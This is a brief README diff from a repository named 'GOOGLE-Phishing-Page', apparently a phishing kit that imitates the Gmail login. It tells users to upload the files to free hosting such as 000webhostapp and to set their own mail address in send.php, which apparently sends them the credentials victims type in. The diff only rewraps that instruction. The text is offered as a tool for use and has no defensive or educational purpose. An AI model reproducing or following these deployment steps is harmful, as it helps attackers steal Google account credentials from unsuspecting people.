Manina123/GOOGLE-Phishing-Page/README.md

  ( G )( M )( A )( I )( L )

- Create free account in 000webhostapp or any free hosting site then upload this files change your mail address in send.php
+ Create free account in 000webhostapp or any free hosting site then upload this files,
+ then change your mail address in send.php
  Thank you :)